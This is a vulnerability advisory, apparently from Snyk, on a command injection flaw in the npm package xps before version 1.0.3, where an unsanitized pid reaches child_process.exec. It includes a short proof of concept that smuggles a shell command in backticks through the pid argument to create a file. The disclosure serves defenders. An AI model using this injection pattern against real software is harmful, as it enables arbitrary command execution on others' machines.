Command Injection Affecting xps package, versions <1.0.3
Snyk CVSS
- Attack Complexity: Low
- Confidentiality: High
- Integrity: High
- Availability: High
Threat Intelligence
- Exploit Maturity: Proof of concept
- Snyk ID SNYK-JS-XPS-590098
- published 24 Jul 2020
- disclosed 23 Jul 2020
- credit d3lla
How to fix?
Upgrade xps to version 1.0.3 or higher.
Overview
xps is a cross-platform library for listing and killing processes.
Affected versions of this package are vulnerable to Command Injection. The argument pid is used to build the command that is passed to the child_process.exec function without any sanitization.
PoC by Alessio (d3lla)
- Create a directory for testing:
    mkdir poc
    cd poc/
- Install the latest vulnerable xps module (v1.0.2):
    npm i xps@1.0.2
- Create the following PoC JavaScript file (poc.js):
    const ps = require('xps');
    ps.kill('`touch HACKED;`').fork();
- Make sure that the HACKED file does not exist:
    ls
- Execute the poc.js file:
    node poc.js
- The HACKED file is created:
    ls